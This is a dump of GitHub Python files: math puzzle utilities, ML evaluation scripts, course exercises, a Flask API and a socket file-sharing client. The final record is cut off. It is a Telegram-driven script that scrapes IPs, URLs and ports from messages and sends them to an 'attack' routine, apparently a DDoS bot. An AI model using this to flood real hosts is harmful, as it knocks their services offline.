True:\n if number < 1:\n yield 1\n elif IsPalindromeInt(number):\n yield number\n number -= 1\n\ndef LargestFactor(number, parameter):\n \"\"\" Returns largest Factor of 'number' smaller than 'parameter' \"\"\"\n parameter -= 1\n while parameter > 0:\n if(number % parameter == 0):\n return parameter\n parameter -= 1\n\ndef PrimeFactors(dictPrime, number):\n \"\"\" Returns the prime factors of the given 'number',\n assumes a dict with all prime numbers less then 'number' as key\n updates this dictionary with count of every prime factor \"\"\"\n d = 2\n while d*d <= number:\n while (number % d) == 0:\n # this inner loop or multiple entries of same prime factor\n dictPrime[d] += 1\n number /= d\n d += 1\n if number > 1:\n dictPrime[number] += 1\n return dictPrime\n \ndef AllFactors(number):\n \"\"\" Returns all the factors of the given number, very effficient code \n returns SET and is not necessarily monotonic\"\"\"\n return set(reduce(list.__add__, \n ([i, number//i] for i in range(1, int(number**0.5) + 1) if number % i == 0)))\n\ndef PrimeFactorsSet(number):\n \"\"\" Returns all the factors of the given number, very effficient code\n returns SET and is not necessarily monotonic\"\"\"\n #return set(reduce(list.__add__,\n # ([i, number] for i in range(1, int(number**0.5) + 1) if number % i == 0 )))\n return set( i for i in range(1, int(number//2) + 1) if number % i == 0 and isPrimeFast(i))\n\ndef NumberOfPrimeFactors(number):\n lenP = 0\n for i in range(1, int(number//2) + 1):\n if number % i == 0 and isPrimeFast(i):\n lenP +=1\n return lenP\n\ndef TriangleNumber(number):\n \"\"\" Generator Function to generate Triangle Numbers starting from 'number' \"\"\"\n while True:\n yield number*(number+1)/2\n number += 1\n \ndef LengthCollatz(number):\n \"\"\" Returns the length of the collatz sequence of given 'number' \"\"\"\n leng = 1\n while True:\n if(number<=1):\n return leng\n elif(number%2==0): \n number /= 2\n else:\n number = 3*number + 1\n leng += 1\n\ndef SumDigits_slow(Number):\n \"\"\" Returns the sum of the digits of a given number \"\"\"\n return sum(map(int, str(Number)))\n\ndef GetDigits(n):\n \"\"\" returns the digits in a list, uses only integer operations\"\"\"\n d = []\n while n:\n d.append(n%10)\n n //= 10\n return d[::-1]\n\ndef SumDigits(n):\n \"\"\" returns the sum of the digits, (only integer operation) source StackOverflow \"\"\"\n r = 0\n while n:\n r,n = r + n%10, n // 10\n return r\n\n \ndef NumberToWord(Number):\n \"\"\" Returns the given number in Word. Number < 100 assumed \"\"\"\n dicWord = {1:'one', 2:'two', 3:'three',4:'four',5:'five',\n 6:'six', 7:'seven',8:'eight',9:'nine', 10:'ten', 11:'eleven',\n 12:'twelve', 13:'thirteen', 14:'fourteen', 15:'fifteen', 16:'sixteen',\n 17:'seventeen', 18:'eighteen', 19:'nineteen',\n 20:'twenty', 30:'thirty', 40:'forty', 50:'fifty', 60:'sixty',\n 70:'seventy', 80:'eighty',90:'ninety'}\n if(Number in dicWord or Number <= 20): return dicWord[Number] \n return dicWord[(Number//10)*10] + dicWord[(Number % 10)]\n \ndef IsAbundant(number):\n \"\"\" Returns true if the given 'number' is abundant\n i.e sum of all its factors is > number \"\"\"\n sumAllFactors = sum(list(sorted(AllFactors(number)))[:-1])\n return sumAllFactors > number\n \ndef Abundant(number=1):\n \"\"\" generator function to generate infinite values of abundant numbers starting from 'number' \"\"\"\n while True:\n if IsAbundant(number):\n yield number\n number += 1\n\ndef Longest_Repeating_Sub_String(strIn):\n largest = ''\n i = 1\n \n while 1:\n m = re.search(\"(\" + (\"\\w\" * i) + \").*\\\\1.*\\\\1\", strIn)\n if not m:\n break\n largest = m.group(1)\n i += 1\n return largest\n \ndef Length_Recurring_Cycle(nu, de):\n \"\"\" Returns the length of recurring decimal cycle for the fraction\n 'nu(merator)'/'de(nominator)' \"\"\"\n \n x = 10 * nu % de\n count = 0\n y=x\n for c in xrange(de):\n y = 10*y % de\n count += 1\n if(y == x):\n return count\n return 0\n \ndef Make_Spiral_Matrix(n):\n \"\"\" Retuns a Spiral Matrix, of NxN, puts values starting at 1 from\n the center and moves to right clockwise \"\"\"\n dx,dy = 1,0 # Starting increments\n x,y = 0,0 # Starting location\n myarray = [[None]* n for j in range(n)]\n for i in range(n**2, 0, -1):\n myarray[x][y] = i\n nx,ny = x+dx, y+dy\n if 0<=nx= 1: return 1\n \n return Linear_Combinations(S, n, m-1) + Linear_Combinations(S, n-S[m], m)\n \ndef Reduce_Fraction(num, den):\n \"\"\" ** USE fractions.Fraction instead **\n Returns the reduced form of the given fraction as 'num' and 'den' \n assumes num <= den\n \"\"\"\n \n newNum = num\n newDen = den\n numFactors = sorted(AllFactors(num), reverse=True)[:-1]\n #print(numFactors)\n for i in range(len(numFactors)):\n f = numFactors[i]\n if (newDen % f == 0 and newNum % f == 0):\n #print 'Before: ' , newNum, newDen, f \n newNum //= f\n newDen //= f\n #print 'After: ' , newNum, newDen, f \n return newNum, newDen\n \ndef IsCircularPrime(num):\n \"\"\" Checks if the given number is circular prime\n - all combinations of given number is prime \"\"\"\n \n a = str(num)\n n = len(a)\n\n llC = [[a[i - j] for i in range(n)] for j in range(n)]\n \n for l in llC:\n lNum = int(''.join(l))\n if(not isPrimeFast(lNum)): return False \n return True\n \ndef Eratosthenes():\n\t'''Yields the sequence of prime numbers via the Sieve of Eratosthenes.\n ** This code is due to David Eppstein, UC Irvine ** \n '''\n\tD = {} # map composite integers to primes witnessing their compositeness\n\tq = 2 # first integer to test for primality\n\twhile 1:\n\t\tif q not in D:\n\t\t\tyield q # not marked composite, must be prime\n\t\t\tD[q*q] = [q] # first multiple of q not already marked\n\t\telse:\n\t\t\tfor p in D[q]: # move each witness to its next multiple\n\t\t\t\tD.setdefault(p+q,[]).append(p)\n\t\t\tdel D[q] # no longer need D[q], free memory\n\t\tq += 1\n \n \ndef IsTrunctablePrime(num):\n \"\"\" Checks if the given PRIME number is Trunctable Prime on both direction \"\"\"\n for i in range(1,len(str(num))):\n if(not isPrimeFast(num//(10**i))): return False\n for i in range(1, len(str(num))):\n if(not isPrimeFast(num % (10**i))): return False\n return True \n \ndef Generate_n_Pandigit_Number(n):\n \"\"\" Returns a pan digit number containing 1..'n' digits \"\"\"\n digits = [str(i) for i in xrange(n, 0, -1)]\n\n for num in permutations(digits):\n yield int(''.join(num))\n \ndef Generate_n_Pandigit_Number_Prime(n):\n \"\"\" Returns a pan digit number containing 1..'n' digits \"\"\"\n digits = [str(i) for i in xrange(n, 0, -1)]\n\n for num in permutations(digits, len(digits)-1):\n ln = list(num)\n if('1' not in ln): ln.append('1')\n elif('3' not in ln): ln.append('3')\n elif('7' not in ln): ln.append('7')\n else: continue\n yield int(''.join(ln))\n\ndef Pentagonal_Numbers():\n \"\"\" Generator function for pentagonal numbers \n Pn = n*(3n-1)/2 \"\"\"\n \n n = 0 \n while True:\n n+= 1\n yield n*(3*n -1)/2\n\ndef IsPentagonal(n):\n \"\"\" Checks if the given number 'n' is pentagonal \"\"\"\n check = (math.sqrt(24*n + 1) + 1)/6\n return int(check) == check\n\ndef IsTriangular(n):\n \"\"\" Checks if the given number 'n' is pentagonal \"\"\"\n check = (math.sqrt(8*n + 1) - 1)/2\n return int(check) == check\n \ndef IsHexagonal(n):\n \"\"\" Checks if the given number 'n' is hexagonal \"\"\"\n check = (math.sqrt(8*n + 1) + 1)/4\n return int(check) == check\n\ndef totient_function(n):\n \"\"\" returns the value of totient function, uses \n Euler's formula, and fast prime checking methods\"\"\"\n\n if isPrimeFast(n): return n-1\n prime_list = PrimeList(n)\n total = 1\n for p in prime_list:\n if n % p == 0: \n total *= (1 - 1/p)\n\n return total*n\n\ndef find_all(a_str, sub):\n \"\"\" finds all the occurence of sub in a_str\"\"\"\n start = 0\n while True:\n start = a_str.find(sub, start)\n if start == -1: return\n yield start\n start += len(sub)\n\ndef Continued_Fraction_number_generator(n):\n \"\"\" for the sqrt(n), generates the number which goes on the CF formula 1 + 1/ x + ( 1/ x + ....))) \"\"\"\n a = n\n b = 0\n c = 1\n while True:\n alpha = int(math.floor((math.sqrt(a)+b)/c))\n yield alpha\n bnew = c*alpha - b\n cnew = a-bnew**2\n anew = a\n if cnew % c == 0:\n cnew = cnew / c\n else:\n anew = a * c\n bnew = bnew * c\n a,b,c = anew,bnew,cnew\n\ndef frac(b, term, v):\n return Fraction(b, term + v)\n\ndef sqrt_convergent(n):\n \"\"\" generates the convergent for the sqrt(n) \"\"\"\n l = Continued_Fraction_number_generator(n)\n a = l.next()\n fg = Fraction(1,l.next())\n while True:\n newFraction = a + fg\n yield newFraction.numerator, newFraction.denominator\n fg = frac(1, fg,l.next()) \n\ndef Pells_Eq_Solution(D):\n \"\"\" returns the smallest solution for the Quadratic Pells Equation for a given D\"\"\"\n ds = sqrt_convergent(D)\n for i in xrange(200):\n x,y = ds.next()\n if x**2 - D*(y**2) == 1:\n return x,y\n return 0,0\n\n","repo_name":"iamaaditya/Project-Euler","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":14422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74443515075","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\nimport tensorflow as tf\r\nfrom keras.models import load_model\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\n\r\n# Disable scientific notation for clarity\r\nnp.set_printoptions(suppress=True)\r\n\r\n# Load the model\r\nmodel = load_model('./models/keras_model.h5', compile=False)\r\nprint(model.summary())\r\n\r\n# Load the labels\r\nclass_names = open('./models/labels.txt', 'r').readlines()\r\n\r\n# Create the array of the right shape to feed into the keras model\r\n# The 'length' or number of images you can put into the array is\r\n# determined by the first position in the shape tuple, in this case 1.\r\n# data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n\r\n# Replace this with the path to your image\r\n# image = Image.open('./data/test/angular_leaf_spot/angular_leaf_spot_test.0.jpg').convert('RGB')\r\n\r\n#resize the image to a 224x224 with the same strategy as in TM2:\r\n#resizing the image to be at least 224x224 and then cropping from the center\r\nsize = (224, 224)\r\n# image = ImageOps.fit(image, size, Image.Resampling.LANCZOS)\r\n\r\ntrain_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n \"./data/train\",\r\n seed=123,\r\n image_size=size,\r\n batch_size=64)\r\n\r\ncorrections = 0\r\nnum_test_samples = 0\r\n\r\nfor image_batch, labels_batch in train_ds:\r\n #turn the image into a numpy array\r\n image_array = np.asarray(image_batch)\r\n labels_batch = np.asarray(labels_batch)\r\n\r\n # Normalize the image\r\n normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n\r\n # run the inference\r\n prediction = model.predict(normalized_image_array)\r\n predictions = np.argmax(prediction, axis=1)\r\n corrections += (predictions == labels_batch).sum()\r\n num_test_samples += len(image_batch)\r\n\r\ntrain_acc = (corrections / num_test_samples) * 100.0\r\nprint(\"total test acc:\", train_acc, \"%\")\r\n\r\ntest_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n \"./data/test\",\r\n seed=123,\r\n image_size=size,\r\n batch_size=64)\r\n\r\ncorrections = 0\r\nnum_test_samples = 0\r\n\r\nfor image_batch, labels_batch in test_ds:\r\n #turn the image into a numpy array\r\n image_array = np.asarray(image_batch)\r\n labels_batch = np.asarray(labels_batch)\r\n\r\n # Normalize the image\r\n normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n\r\n # run the inference\r\n prediction = model.predict(normalized_image_array)\r\n predictions = np.argmax(prediction, axis=1)\r\n corrections += (predictions == labels_batch).sum()\r\n num_test_samples += len(image_batch)\r\n\r\ntest_acc = (corrections / num_test_samples) * 100.0\r\nprint(\"total test acc:\", test_acc, \"%\")","repo_name":"angseung/beans_classify","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38565138235","text":"import inflect\np = inflect.engine()\n\ndef main():\n name_list = []\n try:\n while True:\n name = input(\"Name: \")\n name_list.append(name)\n except EOFError:\n joined_list = p.join(name_list)\n print(f\"Adieu, adieu, to {joined_list}\") \n\nif __name__ == \"__main__\":\n main()","repo_name":"nogueira-tiago/CS50-Python","sub_path":"problem_set_4/adieu/adieu.py","file_name":"adieu.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32320044935","text":"from string import ascii_letters\n\nelf1_sack: str = \"\"\nelf2_sack: str = \"\"\nelf3_sack: str = \"\"\ncounter: int = 0\ncommon_char: str = \"\"\nrearrange_list: str = \"\"\npriority_number: int = 1\npri_dict = {}\npriority_sum: int = 0\n\ninput_list = open(r\"Day3/day3_input.txt\", \"r\")\nfor line in input_list:\n elf3_sack = elf2_sack\n elf2_sack = elf1_sack\n elf1_sack = line\n counter += 1\n if counter == 3:\n for item in elf1_sack:\n if item in elf2_sack and item in elf3_sack:\n rearrange_list = rearrange_list + item\n counter = 0\n break\n\nfor letter in ascii_letters:\n pri_dict[letter] = priority_number\n priority_number += 1\n# print(pri_dict)\n\n\nfor thing in rearrange_list:\n priority_sum = priority_sum + pri_dict[thing]\nprint(priority_sum)\n","repo_name":"Cyber-Shark/AdventOfCode","sub_path":"Day3/solver_part2.py","file_name":"solver_part2.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23391284011","text":"def ispalindrome(x):\n\tstring = str(x)\n\tpalindromelen =len(string)\n\tif palindromelen==1:\n\t\treturn 1\n\tpalindromelen /= 2\n\treturn string[:palindromelen]==string[-palindromelen:][::-1]\n\nt = int(raw_input());\nfor testcase in range(1,t+1):\n\tstring = raw_input()\n\t(start,end) = string.split()\n\tstart = int(start)\n\tend = int(end)\n\tans = 0\n\tnow = int(start**(0.5))\n\twhile 1!=0:\n\t\tNOW = now * now\n\t\tif NOW > end:\n\t\t\tbreak\n\t\tif NOW>=start and ispalindrome(now) and ispalindrome(NOW):\n\t\t\tans+=1\n\t\tnow+=1\n\tprint(\"Case #\"+str(testcase)+\": \"+str(ans))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/1289.py","file_name":"1289.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19987481690","text":"from flask import Flask, request, jsonify, abort\nfrom datetime import datetime\nimport iso8601\nimport pytz\nimport os\nimport re\n\napp = Flask(__name__)\n\n\ndef list_thumbnails(start, end):\n thumbs = os.listdir('../static/thumbs/')\n # print(thumbs)\n app.logger.debug(len(thumbs))\n p = re.compile('out([^\\.]*)\\.png')\n result = []\n latest_timestamp = iso8601.parse_date(\"2000-12-07T23:48:52-0500\")\n for t in thumbs:\n # \"out2017-12-07T23_48_52-0500.png\"\n # -> \"out2017-12-07T23:48:52-0500.png\"\n # -> \"2017-12-07T23:48:52-0500\"\n # -> local datetime\n # -> utc datetime\n m = p.search(t.replace(\"_\", \":\"))\n if m:\n t_timestamp = iso8601.parse_date(m.group(1))\n t_timestamp = t_timestamp.astimezone(pytz.utc)\n latest_timestamp = max(latest_timestamp, t_timestamp)\n if t_timestamp >= start and t_timestamp <= end:\n result.append({\n \"timestamp\": t_timestamp.isoformat(),\n \"url\": \"http://localhost:8080/play/thumbs/%s\" % t\n })\n else:\n app.logger.error(\"Error parsing {}\".format(t))\n # else:\n # app.logger.debug(\"Value outside range: \"+start.isoformat()+\" - \"+end.isoformat())\n # app.logger.debug(t_timestamp.isoformat())\n app.logger.debug(\"Latest timestamp: \"+latest_timestamp.isoformat()+\" ... \"+start.isoformat()+\" - \"+end.isoformat())\n return result\n\n\n@app.route('/api/')\ndef list_thumbnails_view():\n filter_start = request.args.get('start')\n filter_stop = request.args.get('end')\n if filter_start and filter_stop:\n filter_start_date = iso8601.parse_date(filter_start)\n filter_stop_date = iso8601.parse_date(filter_stop)\n thumbnails = list_thumbnails(filter_start_date, filter_stop_date)\n app.logger.error(len(thumbnails))\n return jsonify({'results': thumbnails})\n return abort(400)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5090, debug=True)\n","repo_name":"jhaip/seriallogger2","sub_path":"streaming/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73161450753","text":"import os\r\nfrom art import logo\r\n\r\nbids = {}\r\nnum_of_bidders = 1\r\n\r\n\r\ndef take_bid(bidders):\r\n name = input(\"Hello next bidder, what is your awesome bidding alias?\\n >\")\r\n # Bid can only be a full int, not a float\r\n bid = int(input(\"\\nGreat, and how much money will you be bidding?\\n > $\"))\r\n bidders[name] = bid\r\n # Currently, if the same user enters a higher bid, it will treat them like a new person.\r\n print(\r\n f\"\\nAwesome, {len(bidders)} bidders so far! Before we close the bid, will there be anyone else bidding today?\"\r\n )\r\n\r\n\r\nprint(logo)\r\nprint(\"Welcome to the world's most ghetto auction program.\\n\")\r\nname = input(\"\\nWhat is your awesome bidding alias?\\n >\")\r\nbid = int(\r\n input(\r\n \"\\nGreat, since you're here I assume you have money. How much of that loot will you be bidding today?\\n > $\"\r\n ))\r\nbids[name] = bid\r\nprint(\r\n \"\\nIt wouldn't be much of an auction if you bid alone... is there anyone else who'd like to spend some cash?\"\r\n)\r\nother_bidders = input(\"\\nType Yes or No.\\n >\").lower()\r\n\r\nwhile other_bidders == \"yes\":\r\n os.system(\"clear\")\r\n print(logo)\r\n take_bid(bids)\r\n other_bidders = input(\"Type Yes or No.\\n >\").lower()\r\n\r\nwinner = (max(bids, key=bids.get))\r\nwinning_bid = bids[winner]\r\nprint(\r\n f\"Winner winner chicken dinner! The winner of this auction is {winner}! With an astounding bid of ${winning_bid}!\"\r\n)\r\n","repo_name":"DenzelBraithwaite/100-days-of-Python","sub_path":"day_nine/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11295158200","text":"#!/usr/bin/env python3\n\n########################################################################\n\nimport socket\nimport argparse\nimport sys\n\n# Lab 3 Additional Libraries\nimport os\nimport time\n\n########################################################################\n# Echo-Server class\n########################################################################\n\n# We will not be using this, use the Server class with threading in\n# EchoClientServer_Thread.py\nclass Server:\n\n HOSTNAME = socket.gethostname()\n PORT = 30001\n\n RECV_SIZE = 1024\n BACKLOG = 10\n \n MSG_ENCODING = \"utf-8\"\n\n def __init__(self):\n self.create_listen_socket()\n self.process_connections_forever()\n\n def create_listen_socket(self):\n try:\n # Create an IPv4 TCP socket.\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Get socket layer socket options.\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # Bind socket to socket address, i.e., IP address and port.\n self.socket.bind( (Server.HOSTNAME, Server.PORT) )\n\n # Set socket to listen state.\n self.socket.listen(Server.BACKLOG)\n print(\"Listening on port {} ...\".format(Server.PORT))\n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n def process_connections_forever(self):\n try:\n while True:\n # Block while waiting for incoming connections. When\n # one is accepted, pass the new socket reference to\n # the connection handler.\n self.connection_handler(self.socket.accept())\n except Exception as msg:\n print(msg)\n except KeyboardInterrupt:\n print()\n finally:\n self.socket.close()\n sys.exit(1)\n\n def connection_handler(self, client):\n connection, address_port = client\n print(\"-\" * 72)\n print(\"Connection received from {}.\".format(address_port))\n\n while True:\n\n try:\n\n # Receive bytes over the TCP connection. This will block\n # until \"at least 1 byte or more\" is available.\n recvd_bytes = connection.recv(Server.RECV_SIZE)\n \n # If recv returns with zero bytes, the other end of the\n # TCP connection has closed (The other end is probably in\n # FIN WAIT 2 and we are in CLOSE WAIT.). If so, close the\n # server end of the connection and get the next client\n # connection.\n if len(recvd_bytes) == 0:\n print(\"Closing client connection ... \")\n connection.close()\n break\n \n # Decode the received bytes back into strings. Then output\n # them.\n recvd_str = recvd_bytes.decode(Server.MSG_ENCODING)\n print(\"Received: \", recvd_str)\n \n # Send the received bytes back to the client.\n connection.sendall(recvd_bytes)\n print(\"Sent: \", recvd_str)\n\n except KeyboardInterrupt:\n print()\n print(\"Closing client connection ... \")\n connection.close()\n break\n\n########################################################################\n# Echo-Client class\n########################################################################\n\n# We will be using this for for Lab 3\nclass Client: # Sender\n\n SERVER_HOSTNAME = socket.gethostname()\n RECV_SIZE = 1024\n\n ########################### MODIFICATIONS ##########################\n\n HOST = socket.gethostbyname(socket.gethostname())\n\n # Send the broadcast packet periodically. Set the period (seconds)\n BROADCAST_PERIOD = 1\n\n # Define the message to broadcast.\n MSG_ENCODING = \"utf-8\"\n MESSAGE = \"SERVICE DISCOVERY\"\n MESSAGE_ENCODED = MESSAGE.encode(MSG_ENCODING)\n\n # Use the broadcast-to-everyone IP address or a directed broadcast\n # address. Define a broadcast port.\n BROADCAST_ADDRESS = \"255.255.255.255\"\n BROADCAST_PORT = 30000 # Service Discovery Port (SDP)\n ADDRESS_PORT = (BROADCAST_ADDRESS, BROADCAST_PORT)\n\n ACCEPT_TIMEOUT = 5 # (seconds)\n RECV_SIZE = 1024\n NUM_BROADCAST_PACKETS = 3 # Send 3 \"SERVICE DISCOVERY\" packets\n\n ####################################################################\n\n def __init__(self):\n self.get_socket()\n self.send_console_input_forever()\n\n def get_console_input(self):\n # In this version we keep prompting the user until a non-blank\n # line is entered.\n while True:\n self.input_text = input(\"Enter command: \")\n if self.input_text != '':\n break\n\n def console_commands(self):\n if self.input_text == \"scan\": # THIS WORKS!!!\n self.send_broadcasts()\n elif self.input_text[:7] == \"connect\": # THIS WORKS!!!\n # This is to establish a TCP connection to the server\n IP_addr = ''\n port = ''\n firstWord = True\n for i in self.input_text[8:]:\n if i == ' ':\n firstWord = False\n continue\n if firstWord:\n IP_addr += i\n else:\n port += i\n self.connect_to_server(IP_addr, int(port))\n elif self.input_text == \"llist\": # THIS WORKS!!!\n self.client_directory()\n print(\"Local File Sharing Directory\", self.listDir)\n elif self.input_text == \"rlist\": # THIS WORKS!!!\n self.input_text = \"list\"\n self.connection_send() # Send \"list\" command to Server\n self.connection_receive()\n elif self.input_text[:3] == \"put\":\n self.connection_send()\n print(\"fileName:\", self.input_text[4:])\n self.send_file(self.input_text[4:])\n elif self.input_text[:3] == \"get\": # THIS WORKS!!!\n self.connection_send()\n self.receive_file(self.input_text[4:])\n elif self.input_text[:3] == \"bye\": # THIS WORKS!!!\n self.connection_send() # Send \"bye\" command to Server\n print(\"Closing server connection ...\")\n self.socket[0].close()\n sys.exit(1)\n else:\n print(\"Invalid command\")\n \n def send_console_input_forever(self):\n while True:\n try:\n self.get_console_input()\n self.console_commands()\n #print(\"Did it even come back here?\")\n except (KeyboardInterrupt, EOFError):\n print()\n print(\"Closing server connection ...\")\n self.socket[0].close()\n sys.exit(1)\n\n def client_directory(self):\n os.chdir(\"clientDirectory\")\n self.listDir = os.listdir(os.getcwd())\n os.chdir(\"..\")\n\n def get_socket(self):\n try: \n # Create an IPv4 TCP socket [0] and set up a UDP socket [1].\n self.socket = [socket.socket(socket.AF_INET, socket.SOCK_STREAM),\n socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]\n\n # Set the option for broadcasting.\n self.socket[1].setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n\n # To get the response from SERVER / RECEIVER?\n self.socket[1].bind((Client.HOST, Client.BROADCAST_PORT)) \n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n def send_file(self, fileName): # For \"put\" command to server\n os.chdir(\"clientDirectory\") # Server file directory\n with open(fileName, 'rb') as f:\n while True:\n bytesToSend = f.read(256)\n currSize = sys.getsizeof(bytesToSend)\n self.socket[0].send(bytesToSend)\n if currSize < 256:\n break\n print(fileName, \"succesfully sent!\")\n f.close()\n os.chdir(\"..\") # Move out of directory\n\n def receive_file(self, fileName): # For \"get\" command to server\n os.chdir(\"clientDirectory\") # Client files directory\n## print(\"Current working directory:\", os.getcwd())\n with open('new_' + fileName, 'wb') as f:\n while True:\n data = self.socket[0].recv(256)\n currSize = sys.getsizeof(data)\n print(currSize)\n f.write(data)\n if currSize < 256:\n break\n f.close()\n print(fileName, \"succesfully received!\")\n os.chdir(\"..\") # Move out of directory\n\n\n ############################################################################\n # TCP/IP Methods\n ############################################################################\n\n def connect_to_server(self, IP_addr, port):\n try:\n # Connect to the server using its socket address tuple.\n #self.socket.connect((Client.SERVER_HOSTNAME, Server.PORT))\n #print(\"It tried to connect to the server tho?????\")\n self.socket[0].connect((IP_addr, port))\n except Exception as msg:\n print(msg)\n sys.exit(1)\n \n def connection_send(self):\n try:\n # Send string objects over the connection. The string must\n # be encoded into bytes objects first.\n self.socket[0].sendall(self.input_text.encode(Server.MSG_ENCODING))\n print(\"Sent: \", self.input_text)\n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n def connection_receive(self):\n try:\n # Receive and print out text. The received bytes objects\n # must be decoded into string objects.\n recvd_bytes = self.socket[0].recv(Client.RECV_SIZE)\n\n # recv will block if nothing is available. If we receive\n # zero bytes, the connection has been closed from the\n # other end. In that case, close the connection on this\n # end and exit.\n if len(recvd_bytes) == 0:\n print(\"Closing server connection ... \")\n self.socket[0].close()\n sys.exit(1)\n\n print(\"Received: \", recvd_bytes.decode(Server.MSG_ENCODING))\n\n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n ############################################################################\n # UDP Methods\n ############################################################################\n\n## def create_sender_socket(self):\n## try:\n## # Set up a UDP socket. Index 0.\n## self.socket.append(socket.socket(socket.AF_INET, socket.SOCK_DGRAM))\n##\n## # Set the option for broadcasting.\n## self.socket[0].setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n##\n## # To get the response from SERVER / RECEIVER?\n## self.socket[0].bind((Client.HOST, Client.BROADCAST_PORT)) \n## except Exception as msg:\n## print(msg)\n## sys.exit(1)\n\n def send_broadcasts(self):\n try:\n self.socket[1].settimeout(Client.ACCEPT_TIMEOUT)\n for i in range(Client.NUM_BROADCAST_PACKETS):\n print(\"Broadcasting to {} ...\".format(Client.ADDRESS_PORT))\n self.socket[1].sendto(Client.MESSAGE_ENCODED, Client.ADDRESS_PORT)\n \n # Response from SERVER / RECEIVER\n data, address = self.socket[1].recvfrom(Client.RECV_SIZE)\n time.sleep(Client.BROADCAST_PERIOD)\n #print(data.decode(Client.MSG_ENCODING) == \"Jastine's File Sharing Service\")\n if data.decode(Client.MSG_ENCODING) == \"Jastine's File Sharing Service\":\n print(data.decode(Client.MSG_ENCODING), \"found at\", \"{}\".format((Client.HOST, \"30001\")))\n except socket.timeout:\n print(\"No service found\")\n except KeyboardInterrupt:\n print()\n print(\"Closing CLIENT / SENDER connection ...\")\n except Exception as msg:\n print(msg)\n## finally:\n## #print(\"Just wondering if it did this\")\n self.socket[1].close()\n## #sys.exit(1)\n\n########################################################################\n# Process command line arguments if run directly.\n########################################################################\n\nif __name__ == '__main__':\n roles = {'client': Client,'server': Server}\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-r', '--role',\n choices=roles, \n help='server or client role',\n required=True, type=str)\n\n args = parser.parse_args()\n roles[args.role]()\n\n########################################################################\n\n\n\n\n\n","repo_name":"sittingherelikeaboss/Online-File-Sharing-Network-App","sub_path":"Test4/EchoClientServer.py","file_name":"EchoClientServer.py","file_ext":"py","file_size_in_byte":13009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148928462","text":"import sys\nfrom collections import deque\nimport copy\ndef main():\n S = input()\n T = input()\n ans = 0\n for i in range(len(S)):\n if S[i] != T[i]:\n ans += 1\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc172/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10427953372","text":"# -*- coding: utf-8 -*-\nimport torch\nfrom torch import nn, optim\nfrom matplotlib import pyplot as plt\nfrom sklearn.datasets import load_digits\ndigits = load_digits()\n\nX = digits.data\ny = digits.target\n\nX = torch.tensor(X, dtype=torch.float32)\ny = torch.tensor(y, dtype=torch.int64)\n\nnet = nn.Linear(X.size()[1] , 10)\n\nloss_fn = nn.CrossEntropyLoss()\n\noptimizer = optim.SGD(net.parameters(), lr = 0.01)\n\nlosses = []\n\nfor epoch in range(100):\n optimizer.zero_grad()\n \n y_pred = net(X)\n \n loss = loss_fn(y_pred, y)\n loss.backward()\n \n optimizer.step()\n \n losses.append(loss.item)\n\n_, y_pred = torch.max(net(X), 1)\nans_per = (y_pred == y).sum().item()/len(y)\n\nprint(ans_per)","repo_name":"hika019/takarakuzi","sub_path":"p42.py","file_name":"p42.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38572113281","text":"import asyncio\nimport dotenv\nimport re\nimport parser\n\nfrom telethon import TelegramClient, events\nfrom spam_units import Unit\nfrom winger import Winger\n\nconf = dotenv.dotenv_values()\n\napi_id = conf.get('tg_api_id')\napi_hash = conf.get('tg_api_hash')\n\nclient = TelegramClient('f.russia', int(api_id), api_hash)\n\n\nasync def attack(units: [Unit]):\n for unit in units:\n await Winger(unit).attack()\n\n\nasync def main():\n await client.start()\n pattern = re.compile(\n r'[\\W\\w]+(https?://[\\w\\-\\.]+\\.\\w{2,5})|(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})|(\\d+)/(tcp|udp|http)',\n re.M | re.I\n )\n\n 